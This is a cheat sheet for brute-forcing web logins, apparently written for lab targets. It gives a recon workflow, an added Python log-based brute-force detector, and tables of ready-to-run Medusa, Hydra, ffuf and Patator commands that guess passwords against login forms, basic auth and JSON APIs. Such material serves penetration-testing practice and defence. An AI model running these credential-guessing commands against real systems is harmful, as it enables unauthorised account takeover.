Bruteforcing
Bruteforcing is used to try credentials against a login until we find valid ones.
Workflow
- Identify login endpoints: /login, /auth, /signin
- Analyze the responses:
  - Check whether the error message differs depending on whether the user exists or not.
  - Check whether the response time differs depending on whether the user exists or not.
  - Check cookies, session tokens, etc.
- Check whether protections are in place: MFA, CAPTCHA, rate limiting, account lockout.
- Check default credentials.
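Seen from the defending side, the request bursts that the tools in this cheat sheet generate are easy to spot in a web server access log. The following detector is an added example and is not part of the original cheat sheet; the log lines, login paths, 60-second window and threshold of 5 are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log (combined format): one source hammering the
# login form, one legitimate client. Addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "POST /login.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:12:00:05 +0000] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:12:30:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                     r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
LOGIN_PATHS = {"/login", "/login.php", "/api/login", "/auth", "/signin"}  # assumed endpoints

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that don't match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"].split("?", 1)[0], int(m["status"])

def detect_bruteforce(log_text, window=timedelta(seconds=60), threshold=5):
    """Flag source IPs with >= threshold login requests inside any sliding window.
    Status codes are deliberately ignored: a form that answers 200 + "Invalid"
    on failure (the F=Invalid case in the tables) looks identical to success by code."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] in LOGIN_PATHS:
            attempts[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))   # {'203.0.113.7': 6}
```

Rate limiting and lockout are what stop the burst in the first place; the detector shows when they are missing or being tested.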
Medusa
| Command | Description |
|---|---|
| `medusa -h target.hmv -u admin -P passwords.txt -M http` | Basic GET bruteforce |
| `medusa -h target.hmv -U users.txt -P passwords.txt -M http` | Users + passwords |
| `medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http` | Threads |
| `medusa -h target.hmv -u admin -P passwords.txt -M https` | HTTPS |
| `medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php?user=^USER^&pass=^PASS^:F=Invalid"` | Basic GET with credentials in the URL |
| `medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:username=^USER^&password=^PASS^:F=Invalid"` | Basic POST bruteforce |
| `medusa -h target.hmv -U users.txt -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Login failed"` | Basic POST bruteforce with several users |
| `medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:S=Welcome"` | Detect success by string |
| `medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | Detect failure + threads |
| `medusa -h target.com -u admin -P passwords.txt -M http -m FORM:"/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error"` | Basic JSON |
Hydra
| Command | Description |
|---|---|
| `hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | POST bruteforce |
| `hydra -L users.txt -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | Bruteforce users and passwords |
| `hydra -l admin -P passwords.txt target.hmv http-get-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | GET bruteforce |
| `hydra -l admin -P passwords.txt target.hmv https-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | HTTPS bruteforce |
| `hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:S=Welcome"` | Treats the string "Welcome" as a valid login |
| `hydra -l admin -P passwords.txt -t 16 -V target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"` | Verbose + threads |
| `hydra -l admin -P passwords.txt target.hmv http-post-json "/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error"` | JSON API bruteforce |
| `hydra -L usernames.txt -P passwords.txt www.target.hmv http-get` | Basic auth over GET |
| `hydra -l admin -P passwords.txt target.hmv http-get / -s 1337` | Basic auth on a custom port |
| `hydra -l admin -P passwords.txt target.hmv http-post-form "/login:user=^USER^&pass=^PASS^:S=302"` | Web login form, 302 treated as success |
Ffuf
| Command | Description |
|---|---|
| `ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fr "Invalid"` | Bruteforce password |
| `ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=1234" -w users.txt -fr "Invalid"` | Bruteforce username |
| `ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=FUZ2Z" -w users.txt:FUZZ -w passwords.txt:FUZ2Z` | Bruteforce user/pass with two wordlists |
| `ffuf -u http://target.hmv/api/login -X POST -H "Content-Type: application/json" -d '{"user":"admin","pass":"FUZZ"}' -w passwords.txt -fr "error"` | Bruteforce JSON API |
| `ffuf -u "http://target.hmv/login?user=admin&pass=FUZZ" -w passwords.txt -fr "Invalid"` | Bruteforce GET (the URL must be quoted so the shell does not treat `&` as a background operator) |
| `ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -mc 200` | Filter by HTTP status code |
| `ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fs 1234` | Filter by response size |
Patator
| Command | Description |
|---|---|
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:fgrep='Invalid'` | Basic POST |
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt` | Username + password |
| `patator http_fuzz url='http://target.hmv/login?user=admin&pass=FILE0' method=GET 0=passwords.txt` | GET (credentials in the query string; the original line passed `url=` twice) |
| `patator http_fuzz url=http://target.hmv/api/login method=POST header='Content-Type: application/json' body='{"user":"admin","pass":"FILE0"}' 0=passwords.txt` | JSON |
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:code=401` | Filter by HTTP status code |
| `patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -t 10` | Use 10 threads |